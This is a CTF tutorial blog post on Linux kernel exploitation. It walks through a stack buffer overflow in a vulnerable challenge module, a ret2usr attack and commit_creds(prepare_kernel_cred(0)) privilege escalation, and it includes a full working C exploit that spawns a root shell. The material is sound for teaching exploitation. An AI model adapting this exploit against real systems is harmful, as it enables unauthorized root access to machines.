# Linux Kernel Exploitation - BOF (part1)

Posted on Sat, Jul 31, 2021

# Exploitation

Here comes the part you have been waiting for. Now that you are familiar with the kernel basics needed for exploitation, we can finally get to the main subject of this article.

Keep in mind that exploitation in pwn is often very contextual: the example I am going to show does not necessarily apply everywhere, but I will try to generalize this part as much as possible so that you can exploit other cases.

For this part I will use a kernel exploitation challenge from a CTF and show you the different exploitation techniques.

## First approach

As said before, we will exploit a custom kernel module vulnerable to a buffer overflow (in our case, a stack-based overflow).

Note: in this first case no protection is enabled and the source code is not provided (in other challenges the source code of the module may be provided).

In this part we are going to see a basic and very effective kernel exploitation technique.

But first, let's try to find the entry point.

Wait, this is your first kernel exploitation, you have just landed in the environment and you don't understand anything? Don't worry, I'll explain it quickly.

In most cases, the module is shipped with a few files that boot a Linux system under QEMU, or with a VMware or VirtualBox image.

## Kernel stack layout

On Linux, every thread on your system has a corresponding kernel stack allocated in kernel memory. Linux kernel stacks on x86 are either 4096 or 8192 bytes in size, depending on your distribution. While this size may seem small to contain a full call chain and associated local stack variables, in reality the kernel call chains are relatively shallow and kernel functions are discouraged from abusing the precious space with large local stack variables when efficient allocators such as the SLUB are available.

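The stack shares the 4k/8k total size with the thread_info structure, which contains some metadata about the current thread. On older kernels the union is declared in include/linux/sched.h and, for x86, the structure itself in arch/x86/include/asm/thread_info.h:

union thread_union {
	struct thread_info thread_info;
	unsigned long stack[THREAD_SIZE/sizeof(long)];
};

struct thread_info {
	struct task_struct *task;
	struct exec_domain *exec_domain;
	__u32 flags;
	__u32 status;
	__u32 cpu;
	int preempt_count;
	mm_segment_t addr_limit;
	struct restart_block restart_block;
	void __user *sysenter_return;
#ifdef CONFIG_X86_32
	unsigned long previous_esp;
	__u8 supervisor_stack[0];
#endif
	int uaccess_err;
};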

### Visualising kernel stack

If the attacker controls a count that determines how much stack is consumed and provides a sufficiently large value, the stack may extend down past the boundary of thread_info, allowing the attacker to subsequently write arbitrary values into the thread_info structure.

## File system environment explained

• A shell script that runs the QEMU emulation

• vmlinuz or bzImage

This file is simply the kernel itself, compressed into a single file. It can be extracted into an ELF executable file, "vmlinux", which is useful to look for gadgets when doing ROP.

Tool for extraction: the extract-vmlinux script from the Linux kernel source tree (scripts/extract-vmlinux in torvalds/linux on GitHub).

• initramfs.cpio.gz

The Linux file system, compressed with cpio and gzip. Directories such as /bin, /etc, ... are stored in this file, and the vulnerable kernel module is likely to be included in the file system as well. In other challenges, this file might use a different compression scheme.

We will come back to this file in the article on ROP, because we will interact with it.

Alternatively, you can find the full explanation in the basics unit.

## Analyzing kernel module

/!\ The source code has not been provided for this challenge

## Sending data via FD

As the module is a character device implementing the open, close, read, write, ... operations, sending data through a file descriptor is a good approach.

Quick reminder of what a file descriptor is: in Unix and Unix-like operating systems, a file descriptor (FD, less frequently fildes) is a unique identifier (handle) for a file or other input/output resource.

Again, this will not necessarily be the case everywhere: pwn is very contextual.

void open_fd_device(void)
{
    /* fd_device_global is a global int declared elsewhere in the exploit */
    fd_device_global = open("/dev/bof", O_RDWR);
    if(fd_device_global < 0) {
        printf("[x] Error opening file descriptor\n");
        exit(-1);
    } else {
        printf("[*] File descriptor opened with success\n");
    }
}

By writing to this file descriptor, we manage to send data into kernel space:

write(fd_device_global, "A", 1);

To find the padding, I will let your imagination guide you. Debugging can be used but is not strictly necessary: when the kernel "segfaults", it prints a call trace and a dump of the registers.

For example, after sending this cyclic string, you can see that the value of EIP has been overwritten by part of our string. Locate that part in the cyclic string to calculate the number of bytes that precede it.

aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaaua
aavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboa
abpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaa
aebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaae
vaaewaaexaaeyaae

[   53.345658] BUG: unable to handle kernel paging request at 6161616b
[   53.346067] IP: 0x6161616b
[   53.346067] *pde = 00000000
[   53.346067]
[   53.346067] Oops: 0010 [#1] SMP
[   53.346067] Modules linked in: ch39(O)
[   53.346067] CPU: 0 PID: 1015 Comm: sh Tainted: G           O    4.10.3 #4
[   53.346067] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996),
BIOS 1.10.2-1ubuntu1 04/01/2014
[   53.346067] EIP: 0x6161616b
[   53.346067] EFLAGS: 00000286 CPU: 0
[   53.346067] EAX: 0000c4b8 EBX: 61616169 ECX: 0000000a EDX: c1cda0b9
[   53.346067] ESI: c2800040 EDI: c1cd9f70 EBP: 6161616a ESP: c1cd9ef0
[   53.346067]  DS: 007b ES: 007b FS: 00d8 GS: 0033 SS: 0068
[   53.346067] CR0: 80050033 CR2: 6161616b CR3: 01ce3000 CR4: 001006d0
[   53.346067] Call Trace:
[   53.346067] Code:  Bad EIP value.
[   53.346067] EIP: 0x6161616b SS:ESP: 0068:c1cd9ef0
[   53.346067] CR2: 000000006161616b
[   53.398715] ---[ end trace d9828823a84a77f6 ]---

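The instruction pointer points to 0x6161616b, which in ASCII is "aaak" (stored in memory as "kaaa", since x86 is little-endian).

This means that the "kaaa" chunk of our cyclic string is what overwrites the instruction pointer.

"kaaa" starts 40 bytes into the string, so our padding is 40 bytes.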

## ret2usr attack

This popular technique consists in redirecting the kernel's control flow to code located in userland. That code then runs in kernel mode, which gives us arbitrary code execution with kernel privileges.

(Figure: simplified schema of the ret2usr attack.)

### More details...

One interesting instruction lets us go back to userland: sysretq or iretq on 64-bit (iretd on 32-bit).

iret returns from an interrupt: it hands program control back from an exception or interrupt handler to the program or procedure that was interrupted by an exception, an external interrupt, or a software-generated interrupt. These instructions are also used to return from a nested task.

To return to userland, iretq needs the stack to hold the following 5 values, in this order: RIP|CS|RFLAGS|SP|SS

We therefore save the current state of these registers while still in user mode, so that the switch back to user mode can be carried out without any problem. Note that the snippets below target x86-64, whereas the crash log above comes from a 32-bit kernel, so adapt the register names to your target.

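unsigned long user_cs, user_ss, user_rflags, user_sp;
/* user-mode address to resume at, to be set before triggering the bug
   (for example the address of a function that spawns a shell) */
unsigned long user_rip;

/* Save the user-mode segment selectors, stack pointer and flags
   so they can be restored by iretq later. */
void save_state(){
    __asm__(
        ".intel_syntax noprefix;"
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_sp, rsp;"
        "pushf;"
        "pop user_rflags;"
        ".att_syntax;"
    );
    puts("[*] Saved state");
}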

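void escalate_privs(void)
{
    __asm__(
        ".intel_syntax noprefix;"
        "movabs rax, 0xffffffff814c67f0;" //prepare_kernel_cred (address specific to the target kernel)
        "xor rdi, rdi;"
        "call rax; mov rdi, rax;"         //rdi = prepare_kernel_cred(0)
        "movabs rax, 0xffffffff814c6410;" //commit_creds (address specific to the target kernel)
        "call rax;"
        "swapgs;"                         //restore the user GS base before returning
        "mov r15, user_ss;"               //build the iretq frame: SS, SP, RFLAGS, CS, RIP
        "push r15;"
        "mov r15, user_sp;"
        "push r15;"
        "mov r15, user_rflags;"
        "push r15;"
        "mov r15, user_cs;"
        "push r15;"
        "mov r15, user_rip;"
        "push r15;"
        "iretq;"                          //return to user mode at user_rip
        ".att_syntax;"
    );
}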

In the schema, 0x13371337 points at the save_state() function.

Here the state of the registers is saved correctly, so that the final instruction of our privilege escalation can be iretq.

## Privilege escalation via kernel symbols

### How does it work?

Did I tell you about kernel pointers?

Do you know what is in /proc/kallsyms?

No?

OK, a little reminder, you'll see it's simple: everything in /proc/kallsyms is a kernel symbol.

The kernel can call and use them as functions and variables.

You can see the content with the following command: $ cat /proc/kallsyms

But you're going to ask me: "how is this going to help us?"

It is simple: remember that we redirect the kernel's control flow, so we can redirect it to call these symbols.

But which ones are interesting?

Let me introduce you to our friend...

prepare_kernel_cred!

Why? Let me explain.

prepare_kernel_cred() is a kernel function from cred.c that builds a « cred » structure. You can find the source code in kernel/cred.c (Linux v5.13.12), for example on Bootlin's Elixir Cross Referencer.

Analyzing the source code of this function is where it gets interesting:

struct cred *prepare_kernel_cred(struct task_struct *daemon)
{
	const struct cred *old;
	struct cred *new;

	new = kmem_cache_alloc(cred_jar, GFP_KERNEL);
	if (!new)
		return NULL;

	kdebug("prepare_kernel_cred() alloc %p", new);

	if (daemon)
		old = get_task_cred(daemon);
	else
		old = get_cred(&init_cred);

	validate_creds(old);

	*new = *old;
	new->non_rcu = 0;
	atomic_set(&new->usage, 1);
	set_cred_subscribers(new, 0);
	get_uid(new->user);
	get_user_ns(new->user_ns);
	get_group_info(new->group_info);

#ifdef CONFIG_KEYS
	new->session_keyring = NULL;
	new->process_keyring = NULL;
	new->request_key_auth = NULL;
#endif

#ifdef CONFIG_SECURITY
	new->security = NULL;
#endif
	if (security_prepare_creds(new, old, GFP_KERNEL_ACCOUNT) < 0)
		goto error;

	new->ucounts = get_ucounts(new->ucounts);
	if (!new->ucounts)
		goto error;

	put_cred(old);
	validate_creds(new);
	return new;

error:
	put_cred(new);
	put_cred(old);
	return NULL;
}
EXPORT_SYMBOL(prepare_kernel_cred);

Let me extract the most interesting part:

struct cred *prepare_kernel_cred(struct task_struct *daemon)
{
	const struct cred *old;
	struct cred *new;

	new = kmem_cache_alloc(cred_jar, GFP_KERNEL);
	if (!new)
		return NULL;

	kdebug("prepare_kernel_cred() alloc %p", new);

	if (daemon)
		old = get_task_cred(daemon);
	else
		old = get_cred(&init_cred);

And here is something interesting: the first condition checks whether a task was passed as the parameter.

If so, it calls get_task_cred() on that task, but this is still not what we're looking for.

What is interesting here is what happens when there is no task (when the parameter is NULL).

Execution enters the « else » branch and calls get_cred(), which takes a pointer to a cred structure and returns it after taking a reference; here that pointer is &init_cred.

Looking inside init_cred, we can see that the new structure will be a copy of credentials with full rights, as you can see below (GLOBAL_ROOT_UID):

struct cred init_cred = {
.usage			= ATOMIC_INIT(4),
#ifdef CONFIG_DEBUG_CREDENTIALS
.subscribers		= ATOMIC_INIT(2),
.magic			= CRED_MAGIC,
#endif
.uid			= GLOBAL_ROOT_UID,
.gid			= GLOBAL_ROOT_GID,
.suid			= GLOBAL_ROOT_UID,
.sgid			= GLOBAL_ROOT_GID,
.euid			= GLOBAL_ROOT_UID,
.egid			= GLOBAL_ROOT_GID,
.fsuid			= GLOBAL_ROOT_UID,
.fsgid			= GLOBAL_ROOT_GID,
.securebits		= SECUREBITS_DEFAULT,
.cap_inheritable	= CAP_EMPTY_SET,
.cap_permitted		= CAP_FULL_SET,
.cap_effective		= CAP_FULL_SET,
.cap_bset		= CAP_FULL_SET,
.user			= INIT_USER,
.user_ns		= &init_user_ns,
.group_info		= &init_groups,
.ucounts		= &init_ucounts,
};

To install a cred structure on the current task, you need the commit_creds() function. Its kernel documentation reads:

Install a new set of credentials to the current task, using RCU to replace the old set. Both the objective and the subjective credentials pointers are updated. This function may not be called if the subjective credentials are in an overridden state.

This finally leads us to execute the following in our redirected control flow:

commit_creds(prepare_kernel_cred(0))

This technique cannot be used as is when KASLR and SMEP are enabled; those protections must be bypassed first.

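Here is a function that looks up the address of a symbol:

/* Look up the address of a kernel symbol in /proc/kallsyms (0 if not found). */
unsigned long kallsym_getaddr(const char* str)
{
    FILE *stream;
    char fbuf[256];
    char addr[32];

    stream = fopen("/proc/kallsyms","r");
    if(stream == NULL)
    {
        printf("failed to open /proc/kallsyms\n");
        return 0;
    }

    memset(fbuf,0x00,sizeof(fbuf));

    while(fgets(fbuf,256,stream) != NULL)
    {
        char *p = fbuf;
        char *a = addr;

        if(strlen(fbuf) == 0)
            continue;

        memset(addr,0x00,sizeof(addr));
        fbuf[strlen(fbuf)-1] = '\0';

        /* copy the hexadecimal address, up to the first space */
        while(*p != ' ' && *p != '\0' && a < addr + sizeof(addr) - 1)
            *a++ = *p++;
        if(*p != ' ')
            continue;

        /* skip " T " (space, type letter, space) to reach the symbol name */
        p+=3;
        if(!strcmp(p,str))
        {
            fclose(stream);
            return strtoul(addr, NULL, 16);
        }
    }
    fclose(stream);
    return 0;
}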

or hardcode the addresses directly in inline assembly:

void escalate_privs(void){
    __asm__(
        ".intel_syntax noprefix;"
        "movabs rax, 0xffffffff814c67f0;" //prepare_kernel_cred
        "xor rdi, rdi;"
        "call rax; mov rdi, rax;"         //rdi = prepare_kernel_cred(0)
        "movabs rax, 0xffffffff814c6410;" //commit_creds
        "call rax;"
        "swapgs;"
        "mov r15, user_ss;"               //iretq frame: SS, SP, RFLAGS, CS, RIP
        "push r15;"
        "mov r15, user_sp;"
        "push r15;"
        "mov r15, user_rflags;"
        "push r15;"
        "mov r15, user_cs;"
        "push r15;"
        "mov r15, user_rip;"
        "push r15;"
        "iretq;"
        ".att_syntax;"
    );
}

## Recap of exploitation

As a recap of what we have to do: we send the padding needed to reach the instruction pointer, overwrite its value with the address of our escalate_privs() function, then spawn a shell, and the trick is done.

No protection is enabled here, so some steps are not necessary.

## Final exploitation script

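#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/mman.h>

#define PADDING 40 /* bytes before the saved EIP, found with the cyclic pattern */

int fd_device_global;

unsigned long __attribute__((regparm(3))) (*commit_creds)(unsigned long cred);
unsigned long __attribute__((regparm(3))) (*prepare_kernel_cred)(unsigned long cred);

/* Look up the address of a kernel symbol in /proc/kallsyms (0 if not found). */
unsigned long kallsym_getaddr(const char* str)
{
    FILE *stream;
    char fbuf[256];
    char addr[32];

    stream = fopen("/proc/kallsyms","r");
    if(stream == NULL)
    {
        printf("failed to open /proc/kallsyms\n");
        return 0;
    }

    memset(fbuf,0x00,sizeof(fbuf));

    while(fgets(fbuf,256,stream) != NULL)
    {
        char *p = fbuf;
        char *a = addr;

        if(strlen(fbuf) == 0)
            continue;

        memset(addr,0x00,sizeof(addr));
        fbuf[strlen(fbuf)-1] = '\0';

        /* copy the hexadecimal address, up to the first space */
        while(*p != ' ' && *p != '\0' && a < addr + sizeof(addr) - 1)
            *a++ = *p++;
        if(*p != ' ')
            continue;

        /* skip " T " (space, type letter, space) to reach the symbol name */
        p+=3;
        if(!strcmp(p,str))
        {
            fclose(stream);
            return strtoul(addr, NULL, 16);
        }
    }
    fclose(stream);
    return 0;
}

void get_shell()
{
    if (getuid() == 0){
        printf("[+] Root shell success !\n");
        system("/bin/sh");
    } else {
        printf("[-] failed to get root shell.\n");
    }
}

void open_fd_device(void)
{
    /* the device node name depends on the challenge */
    fd_device_global = open("/dev/vuln", O_RDWR);
    if(fd_device_global < 0) {
        printf("[-] Error opening file descriptor\n");
        exit(-1);
    } else {
        printf("[+] File descriptor opened with success\n");
    }
}

/* Runs in kernel mode once the saved EIP is overwritten: gives the current
   task root credentials. A more robust exploit would end with the iret-based
   return to user mode shown earlier instead of a plain return. */
void escalate_privs(void){
    commit_creds(prepare_kernel_cred(0));
}

int main(void)
{
    char buffer[PADDING + sizeof(unsigned long)];
    /* address of escalate_privs(), the same value objdump shows for a non-PIE binary */
    unsigned long target = (unsigned long)escalate_privs;

    /* resolve the two kernel functions used by escalate_privs() */
    commit_creds = (void *)kallsym_getaddr("commit_creds");
    prepare_kernel_cred = (void *)kallsym_getaddr("prepare_kernel_cred");
    if (!commit_creds || !prepare_kernel_cred) {
        printf("[-] Could not resolve kernel symbols\n");
        return 1;
    }

    open_fd_device();

    /* padding, then the address of escalate_privs() over the saved EIP;
       sent in one write(), assuming the overflow happens within a single call */
    memset(buffer, 'A', PADDING);
    memcpy(buffer + PADDING, &target, sizeof(target));
    write(fd_device_global, buffer, sizeof(buffer));

    // spawn a shell with root permissions
    get_shell();
    return(0);
}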

Once again, this is a contextual case and not all cases are the same. To cope with that, the source code of the module is often provided and is important to analyze; otherwise, debug.

I tried to generalize as much as possible.

# End of part 1

Thank you for reading my article

I hope you liked it. Don't hesitate to join me on my networks.

And see you in part 2 🙂

• Hack The Box

• GitHub: xlt-xau-xef-x0d

Kernel exploitation part 2:

Linux Kernel Exploitation - ROP (part2)